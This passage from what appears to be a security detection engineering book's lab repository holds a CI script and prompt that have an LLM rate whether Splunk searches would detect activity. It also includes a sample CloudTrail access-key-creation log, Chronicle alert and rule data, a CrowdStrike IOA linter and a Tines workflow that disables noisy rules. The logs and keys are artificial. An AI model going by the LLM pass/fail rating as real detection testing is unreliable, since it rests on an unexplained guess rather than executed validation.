52 | message = fp.ProtocolMessage(role="user", content=(prompt_text))
53 |
54 | #main driver
55 | if __name__ == "__main__":
56 | #event loop response
57 | bot_response = asyncio.run(get_responses(api_key, [message]))
58 | print(bot_response)
59 | if '[HIGH]' in bot_response:
60 | print('PASS: AI Evaluation - HIGH')
61 | exit()
62 | elif '[MEDIUM]' in bot_response:
63 | print('CAUTION: AI Evaluation - MEDIUM')
64 | warnings.warn('CAUTION: AI Evaluation - MEDIUM')
65 | elif '[LOW]' in bot_response:
66 | print('FAIL: AI Evaluation - LOW')
67 | raise ValueError('TEST FAIL: AI Low probability Rating. Please check test log and SPL.')
68 | exit(1)
69 | elif '[UNKNOWN]' in bot_response:
70 | print('FAIL: AI Evaluation - UNKNOWN')
71 | raise ValueError('TEST FAIL: AI cannot determine detection. Please check test log and SPL.')
72 | exit(1)
73 |
74 |
--------------------------------------------------------------------------------
/chapter-07/lab-7.1/logs/aws-iam-access-key-creation.log:
--------------------------------------------------------------------------------
1 | {
2 | "eventVersion": "1.09",
3 | "userIdentity": {
4 | "type": "AssumedRole",
5 | "principalId": "AYMPTTZB7KOAMAJXYAORA:GitHub_to_AWS_via_FederatedOIDC",
6 | "arn": "arn:aws:sts::112233445566:assumed-role/GithubOIDC-Actions-Role-WdBZFIFGsMUs/GitHub_to_AWS_via_FederatedOIDC",
7 | "accountId": "112233445566",
8 | "accessKeyId": "ASIAYXJAMAOK345GLT6U",
9 | "sessionContext": {
10 | "sessionIssuer": {
11 | "type": "Role",
12 | "principalId": "AYMPTTZB7KOAMAJXYAORA",
13 | "arn": "arn:aws:iam::112233445566:role/GithubOIDC-Actions-Role-WdBZFIFGsMUs",
14 | "accountId": "112233445566",
15 | "userName": "GithubOIDC-Actions-Role-WdBZFIFGsMUs"
16 | },
17 | "webIdFederationData": {
18 | "federatedProvider": "arn:aws:iam::112233445566:oidc-provider/token.actions.githubusercontent.com",
19 | "attributes": {}
20 | },
21 | "attributes": {
22 | "creationDate": "2024-01-17T23:41:35Z",
23 | "mfaAuthenticated": "false"
24 | }
25 | }
26 | },
27 | "eventTime": "2024-01-17T23:42:03Z",
28 | "eventSource": "iam.amazonaws.com",
29 | "eventName": "CreateAccessKey",
30 | "awsRegion": "us-east-1",
31 | "sourceIPAddress": "40.84.170.239",
32 | "userAgent": "Boto3/1.34.21 md/Botocore#1.34.21 ua/2.0 os/linux#6.2.0-1018-azure md/arch#x86_64 lang/python#3.10.13 md/pyimpl#CPython cfg/retry-mode#legacy Botocore/1.34.21",
33 | "requestParameters": {
34 | "userName": "someUser"
35 | },
36 | "responseElements": {
37 | "accessKey": {
38 | "userName": "someUser",
39 | "accessKeyId": "AKIAYXJAMAOKVPGE4AX7",
40 | "status": "Active",
41 | "createDate": "Jan 17, 2024 11:42:03 PM"
42 | }
43 | },
44 | "requestID": "798a9942-cc13-4c10-bfe3-1dd196e9c468",
45 | "eventID": "1e1a9eb4-3c2a-4f4d-83b2-704216ac71ff",
46 | "readOnly": false,
47 | "eventType": "AwsApiCall",
48 | "managementEvent": true,
49 | "recipientAccountId": "112233445566",
50 | "eventCategory": "Management",
51 | "tlsDetails": {
52 | "tlsVersion": "TLSv1.2",
53 | "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256",
54 | "clientProvidedHostHeader": "iam.amazonaws.com"
55 | }
56 | }
--------------------------------------------------------------------------------
/chapter-07/lab-7.1/prompt.md:
--------------------------------------------------------------------------------
1 | ## Context
2 | - You are a Splunk Cloud Enterprise Security detection engineer bot that analyzes Splunk SPL correlation searches and evaluates against the reference guide and a given log payload if the rule would successfully return results: https://docs.splunk.com/Documentation/Splunk/9.1.2/SearchReference/Commandsbycategory.
3 | - You are also a precise engineering bot that does not deviate from the requirements provided.
4 | ## Requirements
5 | - Do not include unnecessary statements in your response, only code.
6 | - Do not include any explanations in your responses.
7 | - Never fabricate or provide untrue details that impact functionality.
8 | - Do not make mistakes. Always validate your response to work.
9 | - Seek example logs and official documentation on the web to use in your validation.
10 | - Search the web for the official vendor logs and note the format, use it in your analysis.
11 | - Mentally emulate validation of the correlation search as if you were a Splunk engine based on synthesized logging that you generate from searching official vendor information on the web.
12 | - Utilize the log sample provided as a known truth that malicious activity is part of the log that we need to detect on.
13 | - Provide a probability of "[LOW]", "[MEDIUM]", or "[HIGH]" if the correlation search SPL would successfully detect in a separate line with nothing else.
14 | - If you do not know the answer if the correlation search SPL would successfully detect, it is ok, just write: "[UNKNOWN]" with nothing else.
15 | - Your answer output should ONLY be "[LOW]", "[MEDIUM]", "[HIGH]", or "[UNKNOWN]". Do NOT output anything else, not even your analysis or thoughts.
--------------------------------------------------------------------------------
/chapter-07/lab-7.1/requirements.txt:
--------------------------------------------------------------------------------
1 | annotated-types==0.6.0
2 | anyio==4.2.0
3 | certifi==2023.11.17
4 | click==8.1.7
5 | fastapi==0.109.1
6 | fastapi_poe==0.0.28
7 | feedparser==6.0.11
8 | h11==0.14.0
9 | httpcore==1.0.2
10 | httpx==0.26.0
11 | httpx-sse==0.4.0
12 | idna==3.6
13 | pydantic==2.5.3
14 | pydantic_core==2.14.6
15 | sgmllib3k==1.0.0
16 | sniffio==1.3.0
17 | sse-starlette==1.8.2
18 | starlette==0.35.1
19 | typing_extensions==4.9.0
20 | uvicorn==0.25.0
21 |
--------------------------------------------------------------------------------
/chapter-07/lab-7.1/splunk-spl-ai-tester-ci.yml:
--------------------------------------------------------------------------------
1 | # CI workflow: AI-evaluates SPL detections against sample logs via a Poe bot.
2 | # Typo fix: "Synthethic" -> "Synthetic" in the workflow display name.
3 | name: AI Splunk SPL Synthetic Testing
4 |
5 | # Controls when the workflow will run
6 | on:
7 |   push:
8 |     branches: [ "main" ]
9 |     paths:
10 |       - detections/*.spl
11 |   pull_request:
12 |     branches: [ "main" ]
13 |
14 |   # Allows you to run this workflow manually from the Actions tab
15 |   workflow_dispatch:
16 |
17 | # Poe API key used by ci-spl-tester-poe.py; store as a repository secret
18 | env:
19 |   POE_API: ${{ secrets.POE_API }}
20 |
21 | permissions:
22 |   contents: read  # This is required for actions/checkout
23 |
24 | jobs:
25 |   DetectionTestTrigger:
26 |     # The type of runner that the job will run on
27 |     runs-on: ubuntu-latest
28 |     steps:
29 |       # Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it
30 |       - uses: actions/checkout@v4
31 |
32 |       #deploy python and cache requirements
33 |       - name: Setup Python Packages
34 |         uses: actions/setup-python@v5
35 |         with:
36 |           python-version: '3.10'
37 |           cache: 'pip'
38 |       - run: pip install -r ./requirements.txt
39 |       #run AI tests; assumes buildspec.csv is in the repo root
40 |       - name: Run Tests
41 |         run: |
42 |           python ./ci-spl-tester-poe.py
--------------------------------------------------------------------------------
/chapter-07/lab-7.2/linter-custom-ioa.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import jsonschema, json
3 |
4 | #raw openapi spec
5 | #https://assets.falcon.us-2.crowdstrike.com/support/api/swagger-mav.json
6 |
7 | #2023-dec-28 us-2 falcon
8 | custom_ioa_schema = {
9 | "comment": "string",
10 | "description": "string",
11 | "disposition_id": 0,
12 | "field_values": [
13 | {
14 | "final_value": "string",
15 | "label": "string",
16 | "name": "string",
17 | "type": "string",
18 | "value": "string",
19 | "values": [
20 | {
21 | "label": "string",
22 | "value": "string"
23 | }
24 | ]
25 | }
26 | ],
27 | "name": "string",
28 | "pattern_severity": "string",
29 | "rulegroup_id": "string",
30 | "ruletype_id": "string"
31 | }
32 |
33 | try:
34 | #imported sample use case
35 | file_handle = open('test-rule-import.json', 'r')
36 |
37 | use_case_payload = json.load(file_handle)
38 |
39 | results = jsonschema.validate(instance=use_case_payload,
40 | schema=custom_ioa_schema)
41 | #print(results)
42 | if 'None' in str(results):
43 | print('Custom use case payload VALIDATED')
44 | elif str(results) != 'None':
45 | print('ERROR: Custom IOA payload does not meet schema spec for Dec 2023.' +
46 | 'See: https://assets.falcon.us-2.crowdstrike.com/support/api/swagger-us2.html#/custom-ioa/create-rule')
47 | exit(1)
48 | except:
49 | exit(1)
--------------------------------------------------------------------------------
/chapter-08/lab-8.1/Data Ingestion and Health 2024-01-25T1419.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Automating-Security-Detection-Engineering/8a5013402dcf195508db9f5e95c1a79692256034/chapter-08/lab-8.1/Data Ingestion and Health 2024-01-25T1419.pdf
--------------------------------------------------------------------------------
/chapter-08/lab-8.1/Rule Detections 2024-01-25T1416.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Automating-Security-Detection-Engineering/8a5013402dcf195508db9f5e95c1a79692256034/chapter-08/lab-8.1/Rule Detections 2024-01-25T1416.pdf
--------------------------------------------------------------------------------
/chapter-08/lab-8.2/chronicle-alerts.json:
--------------------------------------------------------------------------------
1 | {
2 | "alerts": [
3 | {
4 | "asset": {
5 | "hostname": "host1234.altostrat.com"
6 | },
7 | "alertInfos": [
8 | {
9 | "name": "Antimalware Action Taken",
10 | "sourceProduct": "Microsoft ASC",
11 | "severity": "HIGH",
12 | "timestamp": "2020-11-15T07:21:35Z",
13 | "rawLog": "",
14 | "uri": [
15 | ""
16 | ],
17 | "udmEvent": {
18 | "metadata": {
19 | "eventTimestamp": "2020-11-15T07:21:35Z",
20 | "eventType": "SCAN_FILE",
21 | "vendorName": "Microsoft",
22 | "productName": "ASC",
23 | "productEventType": "Antimalware Action Taken",
24 | "description": "",
25 | "urlBackToProduct": "",
26 | "ingestedTimestamp": "2020-11-30T19:01:11.486605Z"
27 | },
28 | "principal": {
29 | "hostname": "host1234.altostrat.com"
30 | },
31 | "target": {
32 | "file": {
33 | "fullPath": ""
34 | }
35 | },
36 | "securityResult": [
37 | {
38 | "threatName": "WS.Reputation.1",
39 | "ruleName": "AntimalwareActionTaken",
40 | "summary": "Antimalware Action Taken",
41 | "description": "",
42 | "severity": "HIGH"
43 | }
44 | ]
45 | }
46 | }
47 | ]
48 | }
49 | ],
50 | "userAlerts": [
51 | {
52 | "user": {
53 | "email": "john.doe@altostrat.com"
54 | },
55 | "alertInfos": [
56 | {
57 | "name": "",
58 | "sourceProduct": "Office 365 Security and Compliance",
59 | "timestamp": "2020-11-15T13:15:00Z",
60 | "rawLog": "",
61 | "uri": [
62 | ""
63 | ],
64 | "udmEvent": {
65 | "metadata": {
66 | "eventTimestamp": "2020-11-15T13:15:00Z",
67 | "eventType": "EMAIL_TRANSACTION",
68 | "vendorName": "Microsoft",
69 | "productName": "Office 365 Security and Compliance",
70 | "productEventType": "",
71 | "description": "",
72 | "ingestedTimestamp": "2020-11-30T18:29:36.164727Z"
73 | },
74 | "securityResult": [
75 | {
76 | "ruleName": "ThreatManagement",
77 | "summary": "Email reported by user as malware or phish",
78 | "description": "",
79 | "severity": "INFORMATIONAL"
80 | }
81 | ],
82 | "network": {
83 | "email": {
84 | "from": "Webinars\\\\u003cwebinars@example.com\\\\u003e",
85 | "to": [
86 | "john.doe@altostrat.com"
87 | ]
88 | }
89 | }
90 | }
91 | }
92 | ]
93 | }
94 | ]
95 | }
--------------------------------------------------------------------------------
/chapter-08/lab-8.2/chronicle-listrules.json:
--------------------------------------------------------------------------------
1 | {
2 | "rules": [
3 | {
4 | "ruleId": "ru_e6abfcb5-1b85-41b0-b64c-695b3250436f",
5 | "versionId": "ru_e6abfcb5-1b85-41b0-b64c-695b3250436f@v_1602631093_146879000",
6 | "ruleName": "SampleRule",
7 | "metadata": {
8 | "description": "Sample Description of the latest version of the Rule",
9 | "author": "author@example.com"
10 | },
11 | "ruleText": "rule SampleRule {
12 | // Multi event rule to detect logins from a single user for
13 | // multiple cities within a 5 minute window.
14 | meta:
15 | description = \"Sample Description of the latest version of the Rule\"
16 | author = \"author@example.com\"
17 | events:
18 | $e.metadata.event_type = \"USER_LOGIN\"
19 | $e.principal.user.userid = $user
20 | $e.principal.location.city = $city
21 | match:
22 | $user over 5m
23 | condition:
24 | #city > 1
25 | } ",
26 | "liveRuleEnabled": true,
27 | "versionCreateTime": "2020-10-13T23:18:13.146879Z",
 28 |       "compilationState": "SUCCEEDED",
 29 |       "ruleType": "MULTI_EVENT"
30 | },
31 | {
32 | "ruleId": "ru_1971c2ac-8d5b-41aa-bb30-f95d220e9439",
33 | "versionId": "ru_1971c2ac-8d5b-41aa-bb30-f95d220e9439@v_1598398482_260223000",
34 | "ruleName": "SampleRule2",
35 | "metadata": {
36 | "description": "Sample Description of the latest version of the Rule",
37 | "author": "author2@example.com"
38 | },
39 | "ruleText": "rule SampleRule2 {
40 | meta:
41 | description = \"Sample Description of the latest version of the Rule\"
42 | author = \"author2@example.com\"
43 | events:
44 | // Single event rule to generate detections for network events involving example.com
45 | $event.network.dns.questions.name = \"example.com\"
46 | condition:
47 | $event
48 | } ",
 49 |       "versionCreateTime": "2020-08-25T23:34:42.260223Z",
 50 |       "compilationState": "SUCCEEDED",
 51 |       "ruleType": "SINGLE_EVENT"
52 |
53 | }
54 | ]
55 | }
--------------------------------------------------------------------------------
/chapter-08/lab-8.2/tines-count-google-chronicle-alerts-and-disable-noisy-rules.json:
--------------------------------------------------------------------------------
1 | {
2 | "schema_version": 18,
3 | "standard_lib_version": 42,
4 | "action_runtime_version": 6,
5 | "name": "Count-Google-Chronicle-Alerts-and-Disable-Noisy-Rules",
6 | "description": "Retrieve recent alerts from Google Chronicle, deduplicate similar alerts each day, and create Jira tickets for tracking.",
7 | "guid": "f49b6b8e63038426b63e19b46bb023db",
8 | "slug": "count_google_chronicle_alerts_and_disable_noisy_rules",
9 | "agents": [
10 | {
11 | "type": "Agents::HTTPRequestAgent",
12 | "name": "Get Chronicle Recent Alerts",
13 | "disabled": false,
14 | "description": null,
15 | "guid": "fadda0304fd697a9d14b062f7c35be77",
16 | "origin_story_identifier": "cloud:d521f765a49c72507257a2620612ee96:a48bdc93e85dbe8c16fabb95c4794f05",
17 | "options": {
18 | "url": "https://backstory.googleapis.com/v1/alert/listalerts",
 19 |         "content_type": "json",
20 | "method": "get",
21 | "payload": {
 22 |           "start_time": "<< MINUS(%, 800000000) |> DATE(%, \"%Y-%m-%dT%H:%M:%SZ\")>>",
23 | "end_time": "<>",
24 | "page_size": "100"
25 | },
26 | "headers": {
27 | "Authorization": "Bearer <>"
28 | }
29 | },
30 | "reporting": {
31 | "time_saved_value": 0,
32 | "time_saved_unit": "minutes"
33 | },
34 | "monitoring": {
35 | "monitor_all_events": false,
36 | "monitor_failures": false,
37 | "monitor_no_events_emitted": null
38 | },
39 | "template": {
40 | "created_from_template_guid": null,
41 | "created_from_template_version": null
42 | },
43 | "visuals": {
44 | "card_icon_image_contents": null,
45 | "card_icon_image_filename": null,
46 | "card_icon_name": null
47 | },
48 | "width": null,
49 | "schedule": []
50 | },
51 | {
52 | "type": "Agents::EventTransformationAgent",
53 | "name": "Explode Alerts",
54 | "disabled": false,
55 | "description": null,
56 | "guid": "1fb0b928bc45d9bc5cd9659d2b2228c0",
57 | "origin_story_identifier": "cloud:d521f765a49c72507257a2620612ee96:a48bdc93e85dbe8c16fabb95c4794f05",
58 | "options": {
59 | "mode": "explode",
60 | "path": "=get_chronicle_recent_alerts.body.alerts",
61 | "to": "alert"
62 | },
63 | "reporting": {
64 | "time_saved_value": 0,
65 | "time_saved_unit": "minutes"
66 | },
67 | "monitoring": {
68 | "monitor_all_events": false,
69 | "monitor_failures": false,
70 | "monitor_no_events_emitted": null
71 | },
72 | "template": {
73 | "created_from_template_guid": null,
74 | "created_from_template_version": null
75 | },
76 | "visuals": {
77 | "card_icon_image_contents": null,
78 | "card_icon_image_filename": null,
79 | "card_icon_name": null
80 | },
81 | "width": null,
82 | "schedule": null
83 | },
84 | {
85 | "type": "Agents::EventTransformationAgent",
86 | "name": "Explode securityResult from Alert",
87 | "disabled": false,
88 | "description": null,
89 | "guid": "79f44d163dcd8b66ff752d88fb13af87",
90 | "origin_story_identifier": "cloud:d521f765a49c72507257a2620612ee96:a48bdc93e85dbe8c16fabb95c4794f05",
91 | "options": {
92 | "mode": "explode",
93 | "path": "=explode_alerts.alert.securityResult.ruleName",
94 | "to": "ruleName"
95 | },
96 | "reporting": {
97 | "time_saved_value": 0,
98 | "time_saved_unit": "minutes"
99 | },
100 | "monitoring": {
101 | "monitor_all_events": false,
102 | "monitor_failures": false,
103 | "monitor_no_events_emitted": null
104 | },
105 | "template": {
106 | "created_from_template_guid": null,
107 | "created_from_template_version": null
108 | },
109 | "visuals": {
110 | "card_icon_image_contents": null,
111 | "card_icon_image_filename": null,
112 | "card_icon_name": null
113 | },
114 | "width": null,
115 | "schedule": null
116 | },
117 | {
118 | "type": "Agents::HTTPRequestAgent",
119 | "name": "Disable Alerting for a Rule in Chronicle",
120 | "disabled": false,
121 | "description": "Disable alerting for a detection rule in Chronicle",
122 | "guid": "d06c58c9ae33a12c05ecc85814f230c8",
123 | "origin_story_identifier": "cloud:ff0b00e888d6c74e0b6c6aabfa0b601f:f49b6b8e63038426b63e19b46bb023db",
124 | "options": {
125 | "url": "https://backstory.googleapis.com/v2/detect/rules/<>:disableAlerting",
126 | "content_type": "json",
127 | "method": "post",
128 | "payload": {},
129 | "headers": {
130 | "Authorization": "Bearer <>"
131 | }
132 | },
133 | "reporting": {
134 | "time_saved_value": 0,
135 | "time_saved_unit": "minutes"
136 | },
137 | "monitoring": {
138 | "monitor_all_events": false,
139 | "monitor_failures": false,
140 | "monitor_no_events_emitted": null
141 | },
142 | "template": {
143 | "created_from_template_guid": "8950107bc2573c043bd7cfca091a45738c746652a339845e3bc4256d5547ca3e",
144 | "created_from_template_version": null
145 | },
146 | "visuals": {
147 | "card_icon_image_contents": null,
148 | "card_icon_image_filename": null,
149 | "card_icon_name": null
150 | },
151 | "width": null,
152 | "schedule": null
153 | },
154 | {
155 | "type": "Agents::TriggerAgent",
156 | "name": "If 10 sets of 10 rule bursts",
157 | "disabled": false,
158 | "description": null,
159 | "guid": "a8795deda8ce32c2c40c49c1ccf97d0e",
160 | "origin_story_identifier": "cloud:ff0b00e888d6c74e0b6c6aabfa0b601f:f49b6b8e63038426b63e19b46bb023db",
161 | "options": {
162 | "rules": [
163 | {
164 | "type": "field>=value",
165 | "value": "10",
166 | "path": "=COUNTIF(explode_securityresult_from_alert.guid)"
167 | }
168 | ]
169 | },
170 | "reporting": {
171 | "time_saved_value": 0,
172 | "time_saved_unit": "minutes"
173 | },
174 | "monitoring": {
175 | "monitor_all_events": false,
176 | "monitor_failures": false,
177 | "monitor_no_events_emitted": null
178 | },
179 | "template": {
180 | "created_from_template_guid": null,
181 | "created_from_template_version": null
182 | },
183 | "visuals": {
184 | "card_icon_image_contents": null,
185 | "card_icon_image_filename": null,
186 | "card_icon_name": null
187 | },
188 | "width": null
189 | },
190 | {
191 | "type": "Agents::EventTransformationAgent",
192 | "name": "Implode securityResults to Array",
193 | "disabled": false,
194 | "description": null,
195 | "guid": "35f5c09a815f2406d96ddf7b9a87cecc",
196 | "origin_story_identifier": "cloud:ff0b00e888d6c74e0b6c6aabfa0b601f:f49b6b8e63038426b63e19b46bb023db",
197 | "options": {
198 | "mode": "implode",
199 | "item_path": "=explode_securityresult_from_alert.ruleName",
200 | "guid_path": "=explode_securityresult_from_alert.guid",
201 | "size_path": "=10"
202 | },
203 | "reporting": {
204 | "time_saved_value": 0,
205 | "time_saved_unit": "minutes"
206 | },
207 | "monitoring": {
208 | "monitor_all_events": false,
209 | "monitor_failures": false,
210 | "monitor_no_events_emitted": null
211 | },
212 | "template": {
213 | "created_from_template_guid": null,
214 | "created_from_template_version": null
215 | },
216 | "visuals": {
217 | "card_icon_image_contents": null,
218 | "card_icon_image_filename": null,
219 | "card_icon_name": null
220 | },
221 | "width": null,
222 | "schedule": null
223 | },
224 | {
225 | "type": "Agents::HTTPRequestAgent",
226 | "name": "List Rules in Chronicle",
227 | "disabled": false,
228 | "description": "List detection rules in Chronicle",
229 | "guid": "b1198428468ad5208b74b3bd91b03e30",
230 | "origin_story_identifier": "cloud:ff0b00e888d6c74e0b6c6aabfa0b601f:f49b6b8e63038426b63e19b46bb023db",
231 | "options": {
232 | "url": "https://backstory.googleapis.com/v2/detect/rules/",
233 | "content_type": "json",
234 | "method": "get",
235 | "payload": {},
236 | "headers": {
237 | "Authorization": "Bearer <>"
238 | }
239 | },
240 | "reporting": {
241 | "time_saved_value": 0,
242 | "time_saved_unit": "minutes"
243 | },
244 | "monitoring": {
245 | "monitor_all_events": false,
246 | "monitor_failures": false,
247 | "monitor_no_events_emitted": null
248 | },
249 | "template": {
250 | "created_from_template_guid": "b27608bb942d18b66328df5ec059581207a6c47004041ebf6fee29fc3dfbb91e",
251 | "created_from_template_version": null
252 | },
253 | "visuals": {
254 | "card_icon_image_contents": null,
255 | "card_icon_image_filename": null,
256 | "card_icon_name": null
257 | },
258 | "width": null,
259 | "schedule": null
260 | },
261 | {
262 | "type": "Agents::TriggerAgent",
263 | "name": "If ruleName in ruleList",
264 | "disabled": false,
265 | "description": null,
266 | "guid": "e0ffa9ecdcf2b36f1cc90b6d84708842",
267 | "origin_story_identifier": "cloud:ff0b00e888d6c74e0b6c6aabfa0b601f:f49b6b8e63038426b63e19b46bb023db",
268 | "options": {
269 | "rules": [
270 | {
271 | "type": "in",
272 | "value": "explode_alerts.alert.securityResult.ruleName",
273 | "path": "=list_rules_in_chronicle.rules.ruleName"
274 | }
275 | ]
276 | },
277 | "reporting": {
278 | "time_saved_value": 0,
279 | "time_saved_unit": "minutes"
280 | },
281 | "monitoring": {
282 | "monitor_all_events": false,
283 | "monitor_failures": false,
284 | "monitor_no_events_emitted": null
285 | },
286 | "template": {
287 | "created_from_template_guid": null,
288 | "created_from_template_version": null
289 | },
290 | "visuals": {
291 | "card_icon_image_contents": null,
292 | "card_icon_image_filename": null,
293 | "card_icon_name": null
294 | },
295 | "width": null
296 | }
297 | ],
298 | "diagram_notes": [],
299 | "links": [
300 | {
301 | "source": 0,
302 | "receiver": 1
303 | },
304 | {
305 | "source": 1,
306 | "receiver": 2
307 | },
308 | {
309 | "source": 2,
310 | "receiver": 5
311 | },
312 | {
313 | "source": 4,
314 | "receiver": 6
315 | },
316 | {
317 | "source": 5,
318 | "receiver": 4
319 | },
320 | {
321 | "source": 6,
322 | "receiver": 7
323 | },
324 | {
325 | "source": 7,
326 | "receiver": 3
327 | }
328 | ],
329 | "diagram_layout": "{\"fadda0304fd697a9d14b062f7c35be77\":[600,315],\"1fb0b928bc45d9bc5cd9659d2b2228c0\":[600,405],\"79f44d163dcd8b66ff752d88fb13af87\":[600,495],\"d06c58c9ae33a12c05ecc85814f230c8\":[600,1005],\"a8795deda8ce32c2c40c49c1ccf97d0e\":[600,750],\"35f5c09a815f2406d96ddf7b9a87cecc\":[600,630],\"b1198428468ad5208b74b3bd91b03e30\":[600,840],\"e0ffa9ecdcf2b36f1cc90b6d84708842\":[600,930]}",
330 | "send_to_story_enabled": false,
331 | "entry_agent_guid": null,
332 | "exit_agent_guids": [],
333 | "exit_agent_guid": null,
334 | "api_entry_action_guids": [],
335 | "api_exit_action_guids": [],
336 | "keep_events_for": 86400,
337 | "reporting_status": true,
338 | "send_to_story_access": null,
339 | "story_library_metadata": {
340 | "tags": [
341 | "A1003",
342 | "A2005",
343 | "Alerts",
344 | "Case Management",
345 | "Chronicle",
346 | "Google",
347 | "Intermediate",
348 | "A2001"
349 | ],
350 | "icons": [
351 | "google",
352 | "👯",
353 | "jira"
354 | ],
355 | "visibility": "public"
356 | },
357 | "monitor_failures": false,
358 | "send_to_stories": [],
359 | "form": null,
360 | "synchronous_webhooks_enabled": false,
361 | "forms": [],
362 | "pages": [],
363 | "tags": [],
364 | "time_saved_unit": "minutes",
365 | "time_saved_value": 0,
366 | "origin_story_identifier": "cloud:d521f765a49c72507257a2620612ee96:a48bdc93e85dbe8c16fabb95c4794f05",
367 | "integration_product": null,
368 | "integration_vendor": null,
369 | "exported_at": "2024-01-29T00:41:25Z",
370 | "icon": ":google:",
371 | "integrations": []
372 | }
--------------------------------------------------------------------------------
/chapter-09/lab-9.1/atlassian_jql-cheat-sheet.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Automating-Security-Detection-Engineering/8a5013402dcf195508db9f5e95c1a79692256034/chapter-09/lab-9.1/atlassian_jql-cheat-sheet.pdf
--------------------------------------------------------------------------------
/chapter-09/references/Beyond-the-basics-of-scaling-agile-white-paper.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Automating-Security-Detection-Engineering/8a5013402dcf195508db9f5e95c1a79692256034/chapter-09/references/Beyond-the-basics-of-scaling-agile-white-paper.pdf
--------------------------------------------------------------------------------
/chapter-10/diagrams/L1-WorkflowPattern.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Automating-Security-Detection-Engineering/8a5013402dcf195508db9f5e95c1a79692256034/chapter-10/diagrams/L1-WorkflowPattern.png
--------------------------------------------------------------------------------
/chapter-10/diagrams/L2-WorkflowPattern.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Automating-Security-Detection-Engineering/8a5013402dcf195508db9f5e95c1a79692256034/chapter-10/diagrams/L2-WorkflowPattern.png
--------------------------------------------------------------------------------
/chapter-10/diagrams/L3-WorkfowPattern.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Automating-Security-Detection-Engineering/8a5013402dcf195508db9f5e95c1a79692256034/chapter-10/diagrams/L3-WorkfowPattern.png
--------------------------------------------------------------------------------
/chapter-10/lab-10.1/splunk_spl_dev.ipynb:
--------------------------------------------------------------------------------
1 | {
2 | "nbformat": 4,
3 | "nbformat_minor": 0,
4 | "metadata": {
5 | "colab": {
6 | "provenance": []
7 | },
8 | "kernelspec": {
9 | "name": "python3",
10 | "display_name": "Python 3"
11 | },
12 | "language_info": {
13 | "name": "python"
14 | }
15 | },
16 | "cells": [
17 | {
18 | "cell_type": "code",
19 | "execution_count": null,
20 | "metadata": {
21 | "id": "ASWk1jCApXkF"
22 | },
23 | "outputs": [],
24 | "source": []
25 | },
26 | {
27 | "cell_type": "markdown",
28 | "source": [
29 | "# Logging Artifacts"
30 | ],
31 | "metadata": {
32 | "id": "8D3WjDxdqHfW"
33 | }
34 | },
35 | {
36 | "cell_type": "markdown",
37 | "source": [
38 | "Use this section to keep your suggested logs for the use case"
39 | ],
40 | "metadata": {
41 | "id": "mAILNiF6qeCU"
42 | }
43 | },
44 | {
45 | "cell_type": "markdown",
46 | "source": [
47 | "\n",
48 | "\n",
49 | "```\n",
50 | "type=SYSCALL msg=audit(1664132300.181:236): arch=c000003e syscall=59 success=yes exit=0 a0=7fffd11e5500 a1=7fffd11e4b50 a2=7fffd11e4c48 a3=0 items=0 ppid=3086 pid=3167 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=(none) ses=5 comm=\"sshd\" exe=\"/usr/sbin/sshd\" key=(null)\n",
51 | "type=USER_AUTH msg=audit(1664132300.181:237): user pid=3167 uid=0 auid=1000 ses=5 msg='op=PAM:authentication acct=\"jsmith\" exe=\"/usr/sbin/sshd\" hostname=? addr=? terminal=ssh res=success'\n",
52 | "type=USER_START msg=audit(1664132300.181:238): user pid=3167 uid=0 auid=1000 ses=5 msg='op=PAM:session_open acct=\"jsmith\" exe=\"/usr/sbin/sshd\" hostname=? addr=? terminal=ssh res=success'\n",
53 | "type=SYSCALL msg=audit(1664132305.181:239): arch=c000003e syscall=59 success=yes exit=0 a0=55b50fb0f330 a1=7fffd11e4b90 a2=7fffd11e4c88 a3=0 items=0 ppid=3167 pid=3169 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=(none) ses=5 comm=\"bash\" exe=\"/usr/bin/bash\" key=(null)\n",
54 | "type=CWD msg=audit(1664132305.181:240): cwd=\"/home/jsmith\"\n",
55 | "type=PATH msg=audit(1664132305.181:241): item=0 name=\"/bin/ls\" inode=131099 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 objtype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0\n",
56 | "type=USER_END msg=audit(1664132420.246:242): user pid=3167 uid=0 auid=1000 ses=5 msg='op=PAM:session_close acct=\"jsmith\" exe=\"/usr/sbin/sshd\" hostname=? addr=? terminal=ssh res=success'\n",
57 | "```\n",
58 | "\n"
59 | ],
60 | "metadata": {
61 | "id": "svFdMWyNqmUB"
62 | }
63 | },
64 | {
65 | "cell_type": "code",
66 | "source": [
67 | "#grab log data as string and check for accuracy\n",
68 | "file = open('tests/audit-example-log.txt', 'r')\n",
69 | "log_contents = file.read()"
70 | ],
71 | "metadata": {
72 | "id": "Z_LxfbzXtR-O"
73 | },
74 | "execution_count": null,
75 | "outputs": []
76 | },
77 | {
78 | "cell_type": "code",
79 | "source": [
80 | "print(log_contents)"
81 | ],
82 | "metadata": {
83 | "colab": {
84 | "base_uri": "https://localhost:8080/"
85 | },
86 | "id": "fKz-x9nOtnFh",
87 | "outputId": "fd6fc210-23f9-449c-f083-eb1a39a6098d"
88 | },
89 | "execution_count": null,
90 | "outputs": [
91 | {
92 | "output_type": "stream",
93 | "name": "stdout",
94 | "text": [
95 | "type=SYSCALL msg=audit(1664132300.181:236): arch=c000003e syscall=59 success=yes exit=0 a0=7fffd11e5500 a1=7fffd11e4b50 a2=7fffd11e4c48 a3=0 items=0 ppid=3086 pid=3167 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=(none) ses=5 comm=\"sshd\" exe=\"/usr/sbin/sshd\" key=(null)\n",
